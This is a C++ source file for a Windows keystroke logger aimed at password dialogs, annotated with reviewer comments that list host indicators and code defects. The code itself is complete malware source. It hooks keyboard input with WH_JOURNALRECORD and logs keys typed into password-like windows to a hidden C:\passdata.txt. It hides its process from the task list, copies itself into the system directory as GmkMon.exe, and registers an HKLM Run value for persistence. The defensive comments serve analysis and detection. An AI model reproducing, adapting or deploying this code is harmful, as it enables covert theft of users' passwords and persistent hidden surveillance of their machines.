📄 getpwd.cpp
#include <windows.h>
/*
 * Reviewer summary (defensive reading of this listing):
 * the program below is a keystroke logger aimed at password dialogs. It
 * installs a WH_JOURNALRECORD hook, appends translated key presses to a
 * hidden file, copies itself into the system directory and registers a
 * Run value. Artifacts that appear literally in this file and can be used
 * for triage:
 *   - mutex name            "GMKRunOnlyOne"
 *   - log file              C:\passdata.txt (created with FILE_ATTRIBUTE_HIDDEN)
 *   - dropped copy          <system directory>\GmkMon.exe
 *   - autorun value         HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value "GmkMon"
 *   - window class / title  "Get Password" (window is created and then hidden)
 */

/* Mask ANDed with the GetKeyState() result in GetKey() to test "key is down". */
#define KeyPMask 0x80000000
/* Mode values handed to RegisterServiceProcess() through HideProc(). */
#define SERVICE_PROC 1
#define UNSERVICE_PROC 0
/* File name appended to the system directory in WinMain() for the self-copy. */
#define RUN "\\GmkMon.exe"
/* Scratch record used by GetKey(): raw modifier states plus derived flags. */
typedef struct tagKEYDATA
{
char kKey;      /* translated character for the current key */
SHORT kShift;   /* raw GetKeyState(VK_SHIFT) */
SHORT kCaps;    /* raw GetKeyState(0x14) */
SHORT kNum;     /* raw GetKeyState(0x90) */
BOOL bShift;    /* (kShift & KeyPMask) == KeyPMask */
BOOL bCaps;     /* low bit of kCaps */
BOOL bNum;      /* low bit of kNum */
}KEYDATA, *LPKEYDATA;
/* Handle of the journal-record hook; NULL until InstallHook() succeeds in setting it. */
HHOOK hHook = NULL;
/* Resolved at run time from KERNEL32.DLL by HideProc(); not linked statically. */
DWORD (WINAPI *RegisterServiceProcess)(DWORD,DWORD);
LRESULT CALLBACK WndProc (HWND, UINT, WPARAM, LPARAM) ;
LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam);
/*
 * Purpose:
 *   Loads KERNEL32.DLL, looks up the export "RegisterServiceProcess" and
 *   calls it for the current process id with the given mode.
 * Parameters:
 *   mode - value passed through unchanged (callers use SERVICE_PROC or
 *          UNSERVICE_PROC).
 * Returns:
 *   TRUE when the export was found and called, FALSE when the library or
 *   the export could not be obtained. The return value of
 *   RegisterServiceProcess itself is discarded, so TRUE does not prove the
 *   registration took effect.
 * NOTE(review): the export is believed to exist only on Windows 9x/Me,
 *   where a registered service process was omitted from the Ctrl+Alt+Del
 *   task list; on NT-based systems the lookup is expected to fail and this
 *   returns FALSE - confirm for the platform under analysis. A run-time
 *   lookup of this name is itself a useful static-analysis indicator.
 */
BOOL WINAPI HideProc(int mode)
{
/* The module handle is kept for the life of the process; no FreeLibrary is issued here. */
HINSTANCE DLLInst=LoadLibrary("KERNEL32.DLL");
if(DLLInst)
{
RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
GetProcAddress(DLLInst,"RegisterServiceProcess");
if(RegisterServiceProcess)
{
RegisterServiceProcess(GetCurrentProcessId(),mode);
return TRUE;
}
else
return FALSE;
}
else
return FALSE;
}
/*
 * Purpose:
 *   Heuristic that decides whether the currently active window looks like
 *   a password prompt; JournalRecordProc() only logs a key when this
 *   returns TRUE.
 * Returns:
 *   TRUE when one of the checks below matches, FALSE otherwise (including
 *   when GetActiveWindow() yields NULL).
 * How it decides:
 *   1. Climbs from the active window to its top-most ancestor via GetParent().
 *   2. Reads that window's GWL_STYLE and tests the ES_PASSWORD bit.
 *   3. Compares szTemp against "EDTBX" and "RichEdit20W".
 *   4. Reads the window title and compares its first 6 bytes with the
 *      literal used for the dial-up "Connect to" dialog.
 * NOTE(review): at step 3 nothing has written to szTemp yet (no class-name
 *   query is visible in this function), so those two comparisons read an
 *   uninitialized buffer and their outcome is undefined.
 */
BOOL WINAPI IsPassWindow()
{
HWND hWnd,curHwnd;
TCHAR szTemp[MAX_PATH];
DWORD dwsTyle;
curHwnd=GetActiveWindow();
if(curHwnd==NULL)
return FALSE;
/* Walk up the parent chain; hWnd ends as the last non-NULL window. */
while(curHwnd!=NULL)
{
hWnd=curHwnd;
curHwnd=GetParent(hWnd);
}
dwsTyle=GetWindowLong(hWnd,GWL_STYLE);
if(dwsTyle & ES_PASSWORD) // ordinary password edit box
return TRUE;
else if(!lstrcmp(szTemp,"EDTBX")) // Excel password
return TRUE;
else if(!lstrcmp(szTemp,"RichEdit20W") && (dwsTyle & WS_SYSMENU)) // Word password
return TRUE;
/* sizeof(szTemp) is a byte count; it matches the character count only when TCHAR is one byte. */
GetWindowText(hWnd, szTemp, sizeof(szTemp));
if(!strncmp(szTemp, "连接到", 6)) // Dial-up Networking ("Connect to" title prefix)
return TRUE;
return FALSE;
}
/*
 * Purpose:
 *   Translates a virtual-key code into the character that is written to
 *   the log, taking the current Shift, Caps Lock and Num Lock state into
 *   account.
 * Parameters:
 *   nKey - virtual-key code (callers pass the low byte of EVENTMSG.paramL).
 * Returns:
 *   The translated character, or '*' for every key or modifier
 *   combination this table does not cover.
 * Mapping implemented below:
 *   48-57    digits; with Shift held the result is '*'
 *   65-90    letters; upper case when exactly one of Shift / Caps Lock is active
 *   96-105   numeric keypad digits, only while Num Lock is on
 *   186-222  punctuation keys, selected by Shift
 * Because shifted digits and unmapped keys collapse to '*', the log file is
 * a lossy record of what was typed.
 */
TCHAR WINAPI GetKey(int nKey)
{
KEYDATA kd;
kd.kShift=GetKeyState(VK_SHIFT);
kd.kCaps=GetKeyState(0x14); /* 0x14 is VK_CAPITAL */
kd.kNum=GetKeyState(0x90);  /* 0x90 is VK_NUMLOCK */
/* GetKeyState sets the high-order bit of the SHORT while the key is down;
   the comparison relies on the SHORT being sign-extended before the AND. */
kd.bShift=(kd.kShift & KeyPMask)==KeyPMask;
/* Low bit is the toggle state for lock keys. */
kd.bCaps=(kd.kCaps & 1)==1;
kd.bNum=(kd.kNum & 1)==1;
if(nKey>=48 && nKey<=57) // 0-9
{
if(!kd.bShift)
return (kd.kKey=nKey);
else
return '*';
}
else if(nKey>=65 && nKey<=90) // a-z
{
/* nKey is the upper-case code; +32 yields the lower-case letter. */
if(!kd.bCaps)
{
if(kd.bShift)
kd.kKey=nKey;
else
kd.kKey=nKey+32;
}
else if(kd.bShift)
kd.kKey=nKey+32;
else
kd.kKey=nKey;
return kd.kKey;
}
else if(nKey>=96 && nKey<=105) // numeric keypad 0-9
{
if(kd.bNum)
return (kd.kKey=(nKey-96+48));
else
return '*';
}
else if(nKey>=186 && nKey<=222) // other keys
{
switch(nKey)
{
case 186:
if(!kd.bShift)
kd.kKey=';';
else
kd.kKey=':';
break;
case 187:
if(!kd.bShift)
kd.kKey='=';
else
kd.kKey='+';
break;
case 188:
if(!kd.bShift)
kd.kKey=',';
else
kd.kKey='<' ;
break;
case 189:
if(!kd.bShift)
kd.kKey='-';
else
kd.kKey='_';
break;
case 190:
if(!kd.bShift)
kd.kKey='.';
else
kd.kKey='>';
break;
case 191:
if(!kd.bShift)
kd.kKey='/';
else
kd.kKey='?';
break;
case 192:
if(!kd.bShift)
kd.kKey='`';
else
kd.kKey='~' ;
break;
case 219:
if(!kd.bShift)
kd.kKey='[';
else
kd.kKey='{';
break;
case 220:
if(!kd.bShift)
kd.kKey='\\';
else
kd.kKey='|';
break;
case 221:
if(!kd.bShift)
kd.kKey=']';
else
kd.kKey='}';
break;
case 222:
/* Both branches store a backslash, so Shift makes no difference for this code. */
if(!kd.bShift)
kd.kKey='\\';
else
kd.kKey='\\';
break;
default:
/* 'n' is used as an internal "no mapping" marker and is turned into '*' below. */
kd.kKey='n';
break;
}
if(kd.kKey!='n')
return kd.kKey;
else
return '*';
}
else
return '*';
}
/*
 * Purpose:
 *   Appends one translated key to the capture log. (The original header
 *   described this as modifying or removing a key in a target file; the
 *   code below only appends.)
 * Parameters:
 *   nKey - key code; only its low byte is passed to GetKey().
 * Behaviour visible here:
 *   - opens or creates C:\passdata.txt with OPEN_ALWAYS, requesting
 *     FILE_ATTRIBUTE_HIDDEN
 *   - seeks to the end of the file and writes exactly one byte
 *   - the handle returned by CreateFile and the results of the seek and
 *     write are not checked
 * Defensive note: a hidden single-character-append file at this fixed path
 *   is a host indicator; the file is opened and closed once per logged key,
 *   which shows up clearly in file-system auditing.
 */
void WINAPI WritePassFile(int nKey)
{
HANDLE hFile;
DWORD dwBytesWrite=1;
TCHAR lpStr;
hFile=CreateFile("C:\\passdata.txt",
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_HIDDEN,
NULL
);
/* Move to end of file so each key is appended after the previous ones. */
SetFilePointer(hFile,0,NULL,FILE_END);
lpStr=GetKey(LOBYTE(nKey));
WriteFile(hFile,&lpStr,1,&dwBytesWrite,0);
CloseHandle(hFile);
}
/*
 * Purpose:
 *   Installs the journal-record hook once and stores its handle in hHook.
 * Parameters:
 *   hInstance - module handle passed to SetWindowsHookEx.
 * Notes:
 *   - does nothing when hHook is already non-NULL
 *   - thread id 0 is passed, and the result of SetWindowsHookEx is stored
 *     without being checked
 * NOTE(review): WH_JOURNALRECORD is a legacy hook type that observes input
 *   for the whole desktop; current Windows releases are understood to
 *   restrict or no longer support it - confirm against the platform in
 *   question. A call to SetWindowsHookEx with this hook id is a strong
 *   static and behavioural detection signal.
 */
void WINAPI InstallHook(HINSTANCE hInstance)
{
if(hHook==NULL)
hHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalRecordProc,hInstance,0);
}
/*
 * Purpose:
 *   Removes the hook installed by InstallHook(), if there is one.
 * Notes:
 *   hHook is left holding the old handle after the call, and the result of
 *   UnhookWindowsHookEx is not checked.
 */
void WINAPI UninstallHook()
{
if(hHook!=NULL)
UnhookWindowsHookEx(hHook);
}
/*
 * Purpose:
 *   Hook procedure registered for WH_JOURNALRECORD. It inspects each
 *   recorded input event and passes it on to the next hook.
 * Parameters:
 *   nCode  - hook code; forwarded to CallNextHookEx without being examined.
 *   wParam - forwarded unchanged.
 *   lParam - treated as a pointer to an EVENTMSG describing the event.
 * Returns:
 *   Whatever CallNextHookEx returns.
 * Behaviour:
 *   - WM_KEYDOWN: when IsPassWindow() reports a password-like window, the
 *     low byte of paramL is handed to WritePassFile().
 *   - WM_LBUTTONDBLCLK: the cursor position is read into pt and not used.
 */
LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam)
{
EVENTMSG *pMess=(EVENTMSG *)lParam;
POINT pt;
switch(pMess->message)
{
case WM_KEYDOWN:
if(IsPassWindow())
WritePassFile(LOBYTE(pMess->paramL));
break;
case WM_LBUTTONDBLCLK:
GetCursorPos(&pt);
break;
}
return CallNextHookEx(hHook,nCode,wParam,lParam);
}
/*
 * Purpose:
 *   Program entry point. Sets up a hidden window, installs the hook,
 *   establishes persistence and then runs the message loop.
 * Sequence visible below:
 *   1. Single-instance guard through the named mutex "GMKRunOnlyOne";
 *      a second instance exits with code 1.
 *   2. Registers a window class and creates a top-level window titled
 *      "Get Password", which is immediately hidden with SW_HIDE.
 *   3. Calls HideProc(SERVICE_PROC) and InstallHook().
 *   4. Copies its own executable to <system directory>\GmkMon.exe,
 *      overwriting an existing file (bFailIfExists is FALSE).
 *   5. Opens HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and sets
 *      the string value "GmkMon" to the path of that copy.
 *   6. Pumps messages until WM_QUIT.
 * Returns:
 *   msg.wParam of the final message.
 * Defensive note: steps 1, 4 and 5 leave the mutex, the dropped file and
 *   the Run value as host indicators; writing to the system directory and
 *   to HKLM requires administrative rights, so both operations are visible
 *   to privilege and registry auditing. None of the API results in steps
 *   2-4 are checked by this code.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
/* Named mutex used purely as a "run only once" marker; the handle is never released explicitly. */
HANDLE hMutex=CreateMutex(NULL,FALSE,"GMKRunOnlyOne");
if(hMutex==NULL||ERROR_ALREADY_EXISTS==GetLastError())
ExitProcess(1);
static char szAppName[] = "Get Password" ;
HWND hwnd ;
MSG msg ;
WNDCLASSEX wndclass ;
HKEY hKey=0;
DWORD disp=0;
LONG lResult;
TCHAR szKey[MAX_PATH];
TCHAR szSysDir[MAX_PATH+25]; /* extra room for the appended RUN file name */
TCHAR szFileName[MAX_PATH];
wndclass.cbSize = sizeof (wndclass) ;
wndclass.style = CS_HREDRAW | CS_VREDRAW ;
wndclass.lpfnWndProc = WndProc ;
wndclass.cbClsExtra = 0 ;
wndclass.cbWndExtra = 0 ;
wndclass.hInstance = hInstance ;
wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION) ;
wndclass.hCursor = LoadCursor (NULL, IDC_ARROW) ;
wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH) ;
wndclass.lpszMenuName = NULL ;
wndclass.lpszClassName = szAppName ;
wndclass.hIconSm = LoadIcon (NULL, IDI_APPLICATION) ;
RegisterClassEx(&wndclass);
hwnd=CreateWindow( szAppName, "Get Password",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, CW_USEDEFAULT,
NULL, NULL, hInstance, NULL
);
/* The window exists only to own a message loop; it is never shown. */
ShowWindow(hwnd,SW_HIDE);
UpdateWindow(hwnd);
HideProc(SERVICE_PROC);
InstallHook(hInstance);
/* Build "<system directory>\GmkMon.exe" and copy the running image there. */
GetSystemDirectory(szSysDir,MAX_PATH);
lstrcat(szSysDir,RUN);
GetModuleFileName(NULL,szFileName,MAX_PATH);
CopyFile(szFileName,szSysDir,FALSE);
/* Autorun registration under the machine-wide Run key. */
lstrcpy(szKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
lResult=RegCreateKeyEx( HKEY_LOCAL_MACHINE,
szKey,
0,
NULL,
REG_OPTION_VOLATILE,
KEY_ALL_ACCESS,
NULL,
&hKey,
&disp
);
if(lResult==ERROR_SUCCESS)
{
/* The data length passed is lstrlen(), i.e. without the terminating NUL. */
lResult=RegSetValueEx(hKey,"GmkMon",0,REG_SZ,(const unsigned char*)szSysDir,lstrlen(szSysDir));
RegCloseKey(hKey);
}
while (GetMessage (&msg, NULL, 0, 0))
{
TranslateMessage (&msg) ;
DispatchMessage (&msg) ;
}
return msg.wParam ;
}
/*
 * Purpose:
 *   Window procedure for the hidden "Get Password" window.
 * Behaviour:
 *   - WM_PAINT is swallowed (returns 0 without painting).
 *   - WM_DESTROY removes the hook via UninstallHook() and posts WM_QUIT,
 *     which ends the message loop in WinMain().
 *   - every other message goes to DefWindowProc().
 */
LRESULT CALLBACK WndProc (HWND hwnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
{
switch (iMsg)
{
case WM_PAINT:
return 0 ;
case WM_DESTROY:
UninstallHook();
PostQuitMessage (0) ;
return 0 ;
}
return DefWindowProc(hwnd,iMsg,wParam,lParam);
}